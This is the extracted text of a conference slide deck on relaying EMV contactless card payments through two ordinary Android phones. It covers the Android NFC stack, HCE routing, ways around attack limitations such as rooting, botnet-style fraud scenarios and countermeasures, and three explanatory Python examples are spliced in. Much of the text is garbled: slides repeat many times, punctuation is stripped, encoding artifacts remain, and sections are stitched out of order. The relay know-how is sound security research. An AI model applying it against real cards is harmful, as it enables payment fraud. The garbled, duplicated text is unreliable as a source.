Protected by the same fraud guarantee as standard transactions (hopefully).


Background (III): Relay attacks and mafia frauds

Relay attacks: "On Numbers and Games", J. H. Conway (1976).

Mafia frauds: Y. Desmedt (SecuriCom'88).

P → V̄ ⇐ communication link ⇒ P̄ → V

Real-time fraud in which a fraudulent prover P̄ and a fraudulent verifier V̄ cooperate: the honest prover P talks to V̄, which forwards everything over the link to P̄, which in turn talks to the honest verifier V.

Honest prover and verifier: contactless card and Point-of-Sale terminal. Dishonest prover and verifier: two NFC-enabled Android devices.


Android and NFC: A Tale of L♥ve (I): Recap on the evolution of Android NFC support

[Timeline figure: NFC operation modes supported by each Android release]

Android 2.3.3 Gingerbread (API level 10): tag technologies NfcA (ISO/IEC 14443-3A), NfcB (ISO/IEC 14443-3B), NfcF (JIS 6319-4), NfcV (ISO/IEC 15693), IsoDep (ISO/IEC 14443-4), Ndef, NdefFormatable, MifareClassic and MifareUltralight. Modes: Reader/Writer and Peer-to-peer in software; Card-emulation only in hardware.

Android CyanogenMod OS 9.1: IsoPcdA (ISO/IEC 14443-4A) and IsoPcdB (ISO/IEC 14443-4B), thanks to Doug Yeager.

Android 4.2 Jelly Bean (API level 17): NfcBarcode.

Android 4.4 KitKat (API level 19): Reader/Writer, Peer-to-peer and Card-emulation in software (HCE), Card-emulation still available in hardware; NfcAdapter.ReaderCallback added.

Android and NFC: A Tale of L♥ve (II): Digging into the Android NFC stack

Event-driven framework with nice API support.

Two native implementations (depending on the built-in NFC chip): libnfc-nxp and libnfc-nci.

NXP was dropped in favour of NCI: an open architecture not focused on a single chip family, an open interface between the NFC Controller (NFCC) and the Device Host (DH), and a standard proposed by the NFC Forum.


Android and NFC: A Tale of L♥ve (III): Digging into the Android NFC stack: Reader/Writer mode

Not allowed to be set directly → an Android activity is required.

The Android NFC service selects apps according to the tag definition in their Manifest file.

At low level, libnfc-nci uses a reliable mechanism of queues and message passing, the General Kernel Interface (GKI), which makes communication between layers and modules easier.

[Figure: call path of a transceive. User App → Tag (NFC developer framework) → NfcService, mTagService.transceive → IPC → TagService → DeviceHost.TagEndPoint <<realize>> NativeNfcTag → JNI doTransceive → NativeNfcTag.cpp (System NFC Library) → libnfc-nci]

Android and NFC: A Tale of L♥ve (IV): Digging into the Android NFC stack: HCE mode

A service must be implemented to process commands and replies: the HostApduService abstract class and its processCommandApdu method.

Routing is AID-based, through a service table. This means you need to declare in advance which AID you handle.
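The two ideas the slides rely on, the ISO/IEC 7816-4 SELECT-by-AID command from Background (I) and the AID-based routing of Android HCE described just above, as an added example (not code from the slides or from the authors' relay app). It parses short-form command APDUs with proper length checking, builds the explicit SELECT a reader sends, and routes it the way an HCE service table does: only an AID registered in advance has a service to answer, anything else gets 6A82. The AIDs in the table are constructed sample values from the proprietary range, not real payment-scheme AIDs, and exact matching is an assumption of this toy.

```python
"""Parsing ISO/IEC 7816-4 command APDUs and routing SELECT-by-AID.

Added example for this write-up; not code from the slides or from the
authors' relay app.  The AIDs below are constructed sample values.
"""
from dataclasses import dataclass
from typing import Dict, Optional

# ISO/IEC 7816-4 status words.
SW_OK = b"\x90\x00"
SW_WRONG_LENGTH = b"\x67\x00"
SW_INS_NOT_SUPPORTED = b"\x6d\x00"
SW_FILE_NOT_FOUND = b"\x6a\x82"   # SELECT of an AID nobody registered

INS_SELECT = 0xA4
P1_SELECT_BY_DF_NAME = 0x04       # "select by name" means select by AID

# Constructed sample AIDs (proprietary 'F' range), not real ones.
DEMO_AID = bytes.fromhex("f0010203040506")
OTHER_AID = bytes.fromhex("f0deadbeef")


@dataclass
class CommandApdu:
    cla: int
    ins: int
    p1: int
    p2: int
    data: bytes
    le: Optional[int]              # None when the command carries no Le


def parse_command_apdu(raw: bytes) -> CommandApdu:
    """Parse a short-form (case 1 to 4) command APDU.

    Length fields are checked against the buffer, so a truncated or
    padded APDU is rejected instead of being read past its end.
    """
    if len(raw) < 4:
        raise ValueError("command APDU needs a 4-byte header")
    cla, ins, p1, p2 = raw[0], raw[1], raw[2], raw[3]
    body = raw[4:]
    if len(body) == 0:                          # case 1: header only
        return CommandApdu(cla, ins, p1, p2, b"", None)
    if len(body) == 1:                          # case 2: header + Le
        return CommandApdu(cla, ins, p1, p2, b"", body[0] or 256)
    lc = body[0]
    data = body[1:1 + lc]
    if lc == 0 or len(data) != lc:
        raise ValueError("Lc does not match the data field")
    tail = body[1 + lc:]
    if len(tail) == 0:                          # case 3: header + Lc + data
        return CommandApdu(cla, ins, p1, p2, data, None)
    if len(tail) == 1:                          # case 4: header + Lc + data + Le
        return CommandApdu(cla, ins, p1, p2, data, tail[0] or 256)
    raise ValueError("unexpected bytes after Le")


def build_select_by_aid(aid: bytes) -> bytes:
    """Build the explicit SELECT (by DF name) a reader sends for an AID."""
    if not 5 <= len(aid) <= 16:
        raise ValueError("an AID is 5 to 16 bytes long")
    return bytes([0x00, INS_SELECT, P1_SELECT_BY_DF_NAME, 0x00, len(aid)]) + aid + b"\x00"


def selected_aid(apdu: CommandApdu) -> Optional[bytes]:
    """Return the AID when the command is a SELECT by DF name, else None."""
    if apdu.ins == INS_SELECT and apdu.p1 == P1_SELECT_BY_DF_NAME and 5 <= len(apdu.data) <= 16:
        return apdu.data
    return None


class AidRouter:
    """Host-side routing in the style of Android HCE: an AID must have been
    registered in advance to have a service answering its SELECT.  This toy
    matches AIDs exactly and implements no command beyond SELECT."""

    def __init__(self, table: Dict[bytes, str]):
        self.table = dict(table)
        self.active: Optional[str] = None       # service currently selected

    def process_command_apdu(self, raw: bytes) -> bytes:
        try:
            apdu = parse_command_apdu(raw)
        except ValueError:
            return SW_WRONG_LENGTH
        aid = selected_aid(apdu)
        if aid is not None:
            self.active = self.table.get(aid)
            return SW_OK if self.active else SW_FILE_NOT_FOUND
        return SW_INS_NOT_SUPPORTED


def demo_router() -> AidRouter:
    """A routing table with a single registered (constructed) AID."""
    return AidRouter({DEMO_AID: "DemoHceService"})
```

The point of the length checks is that a service receiving APDUs from an arbitrary reader must treat Lc as untrusted input; the point of the 6A82 branch is the limitation the slides describe, namely that an HCE device can only answer a SELECT for an AID it declared beforehand.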

Android and NFC: A Tale of L♥ve (V): Digging into the Android NFC stack: Summary

Description                                        Language(s)   Dependency                  OSS
NFC developer framework (com.android.nfc package)  Java, C++     API level                   Yes
System NFC library (libnfc-nxp or libnfc-nci)      C/C++         Manufacturer                Yes
NFC Android kernel driver                          C             Hardware and manufacturer   Yes
NFC firmware (/system/vendor/firmware directory)   ARM Thumb     Hardware and manufacturer   No

Some useful links:

https://android.googlesource.com/platform/frameworks/base/+/master/core/java/android/nfc

https://android.googlesource.com/platform/packages/apps/Nfc/+/master/src/com/android/nfc

https://android.googlesource.com/platform/packages/apps/Nfc/+/master/nci

https://android.googlesource.com/platform/external/libnfc-nci/+/master/src

http://nfc-forum.org/our-work/specifications-and-application-documents/specifications/nfc-controller-interface-nci-specifications

http://www.cardsys.dk/download/NFC_Docs/NFC%20Controller%20Interface%20(NCI)%20Technical%20Specification.pdf

http://www.datasheet4u.com/PDF/845670/BCM20793S.html

http://www.datasheet4u.com/PDF/845671/BCM20793S-KMLG.html

Android and NFC: A Tale of L♥ve (VI): Some remarkable limitations

Limitation 1: the dishonest verifier communicates with a MIFARE Classic. libnfc-nci does not allow sending raw ISO/IEC 14443-3 commands, because the CRC computation is performed by the NFCC. It can be overcome if the NFCC is modified. EMV contactless cards are IsoDep, fully ISO/IEC 14443-compliant, so this limitation does not affect them.

Limitation 2: the dishonest prover communicates with an honest verifier (device in HCE mode). The AID must be known in advance. It can be overcome if the device is rooted; the Xposed framework may help here, but needs root permissions.


Android and NFC: A Tale of L♥ve (V): Some remarkable limitations and remarks

Limitation 3: the dishonest prover and the dishonest verifier communicate through a non-reliable peer-to-peer relay channel. ISO/IEC 14443-4 defines the Frame Waiting Time as FWT = 256 · (16 / fc) · 2^FWI, with 0 ≤ FWI ≤ 14 and fc = 13.56 MHz. FWT ∈ [500 µs, 5 s] → a relay is theoretically possible when the channel delay is ≤ 5 s.

Concluding remarks: any NFC-enabled device running OTS Android ≥ 4.4 can perform an NFC passive relay attack at APDU level when the specific AID of the honest prover is known and an explicit SELECT is performed.

Any communication involving an APDU-compliant NFC tag (e.g. MIFARE DESFire EV1, Inside MicroPass or Infineon SLE66CL) can also be relayed.

And now, let's move to the practice ☺


Relay Attack Implementation (I): Experiment configuration

PoS device: Ingenico IWL280 with GPRS + NFC support.

Android app developed (±2000 LOC). Two OTS Android NFC-capable devices.

One constraint only: the dishonest prover must run Android ≥ 4.4.


Relay Attack Implementation (II): Threat Scenarios: Scenario 1, Distributed Mafia Fraud

[Figure: a BOTMASTER coordinating several BOTs]

Relay Attack Implementation (III): Threat Scenarios: Scenario 2, Hiding Fraud Locations

Relay Attack Implementation (IV): Resistant mechanisms

Brief summary of resistant mechanisms:

Distance-bounding protocols: upper-bound the physical distance using the Round-Trip Time of cryptographic challenge-response messages.

Timing constraints: not enforced in current NFC-capable systems, and the protocol itself allows timing extension commands.

Physical countermeasures: whitelisting/blacklisting (random UID in HCE mode → unfeasible); RFID blocking covers; physical button/switch activation; secondary authentication methods (e.g. on-card fingerprint scanners).
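The timing argument of Limitation 3 (the FWT formula of ISO/IEC 14443-4) and the first two resistant mechanisms above, distance bounding and timing constraints, carried through in one added example (not code from the slides or from the authors' app). It evaluates the FWT formula for every legal FWI, which gives roughly 300 µs at FWI = 0 and roughly 5 s at FWI = 14, and then judges the same relayed reply twice: once against FWT, which at its maximum tolerates seconds and therefore lets a millisecond-scale relay hop through, and once against a distance-bounding verifier whose RTT bound is derived from a maximum distance plus a small processing allowance. The round-trip model is a deliberate simplification (a simulated clock, and an HMAC over a nonce standing in for the rapid single-bit exchange of a real distance-bounding protocol); the key, delays and distances are constructed sample values.

```python
"""Timing defences against relays: ISO/IEC 14443-4 FWT vs. distance bounding.

Added example for this write-up; not code from the slides or the authors'
relay app.  Delays are simulated (no real clock), an HMAC stands in for
the challenge-response, and all numbers are constructed sample values.
"""
import hashlib
import hmac
import os
from typing import Dict

FC_HZ = 13.56e6                  # ISO/IEC 14443 carrier frequency fc
C_M_PER_S = 299_792_458.0        # speed of light, for the distance bound


def frame_waiting_time(fwi: int) -> float:
    """FWT = 256 * (16 / fc) * 2**FWI seconds, 0 <= FWI <= 14 (ISO/IEC 14443-4)."""
    if not 0 <= fwi <= 14:
        raise ValueError("FWI must be in 0..14")
    return 256 * (16 / FC_HZ) * (2 ** fwi)


def fwt_table() -> Dict[int, float]:
    """FWT for every legal FWI: about 302 us at FWI=0 up to about 4.95 s at FWI=14."""
    return {fwi: frame_waiting_time(fwi) for fwi in range(15)}


def within_fwt(response_delay_s: float, fwi: int) -> bool:
    """Would a reader that strictly enforced FWT still accept a reply this late?"""
    return response_delay_s <= frame_waiting_time(fwi)


class Prover:
    """The legitimate card: answers a nonce with HMAC-SHA256 under the shared key."""

    def __init__(self, key: bytes, processing_s: float):
        self.key = key
        self.processing_s = processing_s     # time the card needs to compute the answer

    def respond(self, nonce: bytes) -> bytes:
        return hmac.new(self.key, nonce, hashlib.sha256).digest()


class DistanceBoundingVerifier:
    """The terminal: accepts only a correct response that also arrived within the
    RTT permitted by max_distance_m plus an allowance for the card's processing."""

    def __init__(self, key: bytes, max_distance_m: float, processing_allowance_s: float):
        self.key = key
        self.rtt_bound_s = 2 * max_distance_m / C_M_PER_S + processing_allowance_s

    def verify(self, prover: Prover, distance_m: float, relay_hop_one_way_s: float) -> bool:
        nonce = os.urandom(16)
        # Simulated clock: propagation both ways + relay hop both ways + card processing.
        rtt_s = 2 * distance_m / C_M_PER_S + 2 * relay_hop_one_way_s + prover.processing_s
        response = prover.respond(nonce)
        expected = hmac.new(self.key, nonce, hashlib.sha256).digest()
        return hmac.compare_digest(response, expected) and rtt_s <= self.rtt_bound_s


def demo() -> Dict[str, bool]:
    """Direct card vs. relayed card, judged by FWT and by distance bounding."""
    key = b"constructed-demo-key"              # sample shared secret, not a real one
    card = Prover(key, processing_s=20e-6)     # constructed: 20 us to answer
    terminal = DistanceBoundingVerifier(key, max_distance_m=1.0,
                                        processing_allowance_s=50e-6)
    relay_hop_s = 1e-3                         # constructed: 1 ms per relay hop, one way
    relayed_rtt_s = 2 * relay_hop_s + card.processing_s
    return {
        # At its maximum (FWI = 14) the frame waiting time tolerates seconds,
        # so it cannot stop a relay that adds milliseconds.
        "relayed_reply_within_fwt14": within_fwt(relayed_rtt_s, 14),
        # A tight RTT bound derived from distance can.
        "direct_card_accepted": terminal.verify(card, distance_m=0.05, relay_hop_one_way_s=0.0),
        "relayed_card_accepted": terminal.verify(card, distance_m=0.05, relay_hop_one_way_s=relay_hop_s),
    }
```

Two things the numbers make visible: the FWT budget is negotiated by the card (FWI is the card's parameter), and the slides note that ISO/IEC 14443-4 also allows waiting-time extension requests, so a verifier that relied on FWT alone would be checking a bound the other side controls. A distance-bounding verifier instead fixes the bound itself from physics plus a processing allowance, which is why the relayed exchange fails it while the direct one passes.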


Related Work: On relay attacks

2005-2009: first works, built on specific hardware.

2010: Nokia mobile phones with NFC capability plus a Java MIDlet app.

2012-2013: relay attacks on Android accessing Secure Elements. A SE securely stores data associated with credit/debit cards; this approach needs a non-OTS Android device.

2014: active relay attacks with custom hardware and custom Android firmware.

Several works studied the delay over the relay channel: relays over long distances are feasible → latency isn't a hard constraint.

Ask us for specific references: too many names for a single slide.


Conclusions (I)

The security of NFC rests on the assumption of physical proximity.

NFC threats: eavesdropping, data modification, relay attacks.

Android NFC-capable devices are on the rise, and can be abused to interact with cards in their proximity.

Conclusions: review of the Android NFC stack; Proof-of-Concept of relay attacks using Android OTS devices; threat scenarios introduced; virtual pickpocketing attacks may appear before long.


Conclusions (II): But then, what the hell can I do? Should I run away?


Conclusions (III)

Future work: develop a botnet infrastructure and earn money; timing constraints of Android HCE mode; try active relay attacks with EMV contactless cards.

Acknowledgments: Spanish National Cybersecurity Institute (INCIBE); University of León under contract X43; HITB staff.

And thanks to all for hearing us!

Visit http://vwzq.net/relaynfc for more info about the project.


Introduction to NFC (V)

[Figure taken from "13.56 MHz RFID Proximity Antennas" (http://www.nxp.com/documents/application_note/AN78010.pdf)]

Introduction to NFC (VI)

Introduction to NFC (VII)

OK. So it is secure, right? Right?

If it were so secure, you would not be staring at us ☺

NFC security threats:

Eavesdropping: secure communication as the solution.

Data modification (i.e. alteration, insertion or destruction): feasible in theory (but requires quite advanced RF knowledge).

Relays: forwarding of wireless communication. Two types: passive (just forwards) or active (forwards and alters the data).

We focus on passive relay attacks.

Introduction to NFC (VII)

Ok So is it secure right RightIf it were so secure you would not be staring at us uml

NFC security threatsEavesdropping

Secure communication as solution

Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)

RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)

We focus on passive relay attacks

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36

Introduction to NFC (VII)

Ok So is it secure right RightIf it were so secure you would not be staring at us uml

NFC security threatsEavesdropping

Secure communication as solution

Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)

RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)

We focus on passive relay attacks

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36

Introduction to NFC (VII)

Ok So is it secure right RightIf it were so secure you would not be staring at us uml

NFC security threatsEavesdropping

Secure communication as solution

Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)

RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)

We focus on passive relay attacks

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36

Introduction to NFC (VIII)

NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments

500M NFC payment users expected by 2019

Almost 300 smart phones available at themoment with NFC capabilities

Check httpwwwnfcworldcomnfc-phones-list

Most of them runs Android OS

Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device

If so what are the constraints (whether any exists)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36

Introduction to NFC (VIII)

NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments

500M NFC payment users expected by 2019

Almost 300 smart phones available at themoment with NFC capabilities

Check httpwwwnfcworldcomnfc-phones-list

Most of them runs Android OS

Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device

If so what are the constraints (whether any exists)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36

Background (I)EMV contactless cards

Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines

Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)

Application ID (AID) command

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (III)

Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)

Mafia frauds ndash Y Desmedt (SecuriComrsquo88)

P minusrarr V communication link P minusrarr V

Real-time fraud where a fraudulent prover P and verifierV cooperate

Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36

Background (III)

Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)

Mafia frauds ndash Y Desmedt (SecuriComrsquo88)

P minusrarr V communication link P minusrarr V

Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36

Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support

Android 42 Jelly Bean (API level 17)

NfcBarcode

IsoPcdB(ISOIEC 14443-4B)

IsoPcdA(ISOIEC 14443-4A)

Android CyanogenMod OS 91

NfcA(ISOIEC 14443-3A)

NfcB(ISOIEC 14443-3B)

NfcV(ISOIEC 15693)

IsoDep(ISOIEC 14443-4)

NfcF(JIS 6319-4)

Ndef

Android 233 Gingerbread (API level 10)

NdefFormatable MifareClassic

MifareUltralight

Android 44 KitKat (API level 19)

thanks to Doug Year

Software

ReaderWriter

Peer-to-peer

Card-emulation

Hardware

Card-emulation

Software

ReaderWriter

Peer-to-peer

Hardware

Card-emulation NfcAdapterReaderCallback

added

NFC

op

erati

on

mod

es

su

pp

orte

d

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36

Android and NFC A Tale of Lrve (II)Digging into Android NFC stack

Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)

libnfc-nxp

libnfc-nci

NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36

Android and NFC A Tale of Lrve (II)Digging into Android NFC stack

Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)

libnfc-nxp

libnfc-nci

NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36

Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode

Not allowed to be set directlyrarr Android activity

Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)

Makes communication between layers and modules easier

User App

Tag

NFC developer framework

NfcService

mTagServicetransceive

IPC

TagService

DeviceHostTagEndPoint

ltltrealizegtgt

NativeNfcTag

JNI

doTransceive

System NFC Library

NativeNfcTagcpp

libnfc-nci

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36

Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode

A service must be implemented to process commands and replies

HostApduService abstract class and processCommandApdu methodAID-based routing service table

This means you need to declare in advance what AID you handle

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36

Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary

Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes

(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)

NFC Android kernel driver C Hardware and manufac-turer

Yes

NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer

Some useful links:
https://android.googlesource.com/platform/frameworks/base/+/master/core/java/android/nfc
https://android.googlesource.com/platform/packages/apps/Nfc/+/master/src/com/android/nfc
https://android.googlesource.com/platform/packages/apps/Nfc/+/master/nci
https://android.googlesource.com/platform/external/libnfc-nci/+/master/src
http://nfc-forum.org/our-work/specifications-and-application-documents/specifications/nfc-controller-interface-nci-specifications/
http://www.cardsys.dk/download/NFC_Docs/NFC%20Controller%20Interface%20(NCI)%20Technical%20Specification.pdf
http://www.datasheet4u.com/PDF/845670/BCM20793S.html
http://www.datasheet4u.com/PDF/845671/BCM20793SKMLG.html

Android and NFC: A Tale of L♥ve (VI) – Some remarkable limitations

Limitation 1: Dishonest verifier communicates with a MIFARE Classic
libnfc-nci does not allow sending raw ISO/IEC 14443-3 commands

Caused by the CRC computation performed by the NFCC

Can be overcome if the NFCC is modified

EMV contactless cards are IsoDep, fully ISO/IEC 14443-compliant

Limitation 2: Dishonest prover communicates with an honest verifier
Device in HCE mode

AID must be known in advance

Can be overcome if the device is rooted

Xposed framework may help to overcome this issue, but needs root permissions


Android and NFC: A Tale of L♥ve (V) – Some remarkable limitations and remarks

Limitation 3: Dishonest prover and dishonest verifier communicate through a non-reliable peer-to-peer relay channel
ISO/IEC 14443-4 defines the Frame Waiting Time as FWT = 256 · (16 / fc) · 2^FWI, 0 ≤ FWI ≤ 14, where fc = 13.56 MHz

FWT ∈ [500 µs, 5 s] → relay is theoretically possible when the delay is ≤ 5 s
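The FWT formula above, worked through as an added Python example (not the authors' code): it tabulates FWT for every FWI, finds the smallest FWI that still covers a given response delay and, going one step beyond the slide, includes the S(WTX) waiting-time extension from the same standard (multiplier WTXM in 1..59, FWT_TEMP = FWT · WTXM), which is the "timing extension command" the Resistant Mechanisms slide refers to. fc and the FWI range are the slide's; the function names are ours. The formula itself gives about 302 µs for FWI = 0; the slide rounds this to 500 µs.

```python
"""Frame Waiting Time (FWT) of ISO/IEC 14443-4, worked through in code.

Added example for this deck, not the authors' code. fc, the FWT formula and
the 0..14 range of the Frame Waiting Integer (FWI) come from the slide; the
Waiting Time eXtension multiplier range (WTXM 1..59) is taken from the same
standard; every function name here is ours.
"""
from typing import Dict, Optional

FC_HZ = 13.56e6                 # carrier frequency fc = 13.56 MHz
FWI_MIN, FWI_MAX = 0, 14        # Frame Waiting Integer range
WTXM_MIN, WTXM_MAX = 1, 59      # S(WTX) multiplier range


def fwt_seconds(fwi: int) -> float:
    """FWT = 256 * (16 / fc) * 2**FWI, in seconds."""
    if not FWI_MIN <= fwi <= FWI_MAX:
        raise ValueError(f"FWI must be in [{FWI_MIN}, {FWI_MAX}], got {fwi}")
    return 256 * (16 / FC_HZ) * 2 ** fwi


def fwt_table() -> Dict[int, float]:
    """FWT for every admissible FWI value (15 entries)."""
    return {fwi: fwt_seconds(fwi) for fwi in range(FWI_MIN, FWI_MAX + 1)}


def fwt_with_wtx(fwi: int, wtxm: int) -> float:
    """Temporary FWT after the card requests a Waiting Time eXtension:
    FWT_TEMP = FWT * WTXM. A reader that honours S(WTX) stretches the
    window it waits for a reply, which weakens any timing-only defence."""
    if not WTXM_MIN <= wtxm <= WTXM_MAX:
        raise ValueError(f"WTXM must be in [{WTXM_MIN}, {WTXM_MAX}], got {wtxm}")
    return fwt_seconds(fwi) * wtxm


def smallest_fwi_covering(delay_s: float) -> Optional[int]:
    """Smallest FWI whose FWT still covers a given response delay (for
    instance the latency a relay channel adds), or None if even FWI = 14
    would time out."""
    for fwi in range(FWI_MIN, FWI_MAX + 1):
        if fwt_seconds(fwi) >= delay_s:
            return fwi
    return None


def reader_accepts(fwi: int, observed_delay_s: float,
                   honour_wtx: bool = False, wtxm: int = 1) -> bool:
    """Reader-side timing check: does a reply arriving after observed_delay_s
    fall inside the window the reader is willing to wait?"""
    window = fwt_with_wtx(fwi, wtxm) if honour_wtx else fwt_seconds(fwi)
    return observed_delay_s <= window


if __name__ == "__main__":
    for fwi, fwt in fwt_table().items():
        print(f"FWI={fwi:2d}  FWT={fwt * 1e3:10.3f} ms")
    print("FWI needed to absorb 0.5 s of relay delay:", smallest_fwi_covering(0.5))
    print("FWI=4 reader, 10 ms reply, no WTX:", reader_accepts(4, 0.01))
    print("FWI=4 reader, 10 ms reply, WTXM=3:", reader_accepts(4, 0.01, True, 3))
```

A reader configured with a small FWI and no S(WTX) handling leaves only a few milliseconds for a reply, which is the timing margin a relay has to fit into; the table shows how quickly that margin grows with FWI, and fwt_with_wtx() shows how a single extension request undoes it.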

Concluding Remarks
Any NFC-enabled device running OTS Android ≥ 4.4 can perform an NFC passive relay attack at APDU level when the specific AID of the honest prover is known and an explicit SELECT is performed

Any communication involving an APDU-compliant NFC tag (i.e., MIFARE DESFire EV1, Inside MicroPass or Infineon SLE66CL) can also be relayed

And now, let's move to the practice ☺



Relay Attack Implementation (I) – Experiment configuration

PoS device: Ingenico IWL280 with GPRS + NFC support

Android app developed (±2000 LOC)
Two OTS Android NFC-capable devices

One constraint: only the dishonest prover must run Android ≥ 4.4


Relay Attack Implementation (II) – Threat Scenarios – Scenario 1

Distributed Mafia Fraud

[Figure: a BOTMASTER connected to several BOT devices]

Relay Attack Implementation (III) – Threat Scenarios – Scenario 2

Hiding Fraud Locations


Relay Attack Implementation (IV) – Resistant Mechanisms

Brief summary of resistant mechanisms
Distance-bounding protocols

Upper bounding the physical distance using the Round-Trip-Time of cryptographic challenge-response messages

Timing constraints
Not enforced in current NFC-capable systems
The protocol itself allows timing extension commands

Physical countermeasures
Whitelisting/blacklisting: random UID in HCE mode → unfeasible
RFID blocking covers
Physical button/switch activation
Secondary authentication methods (e.g., on-card fingerprint scanners)
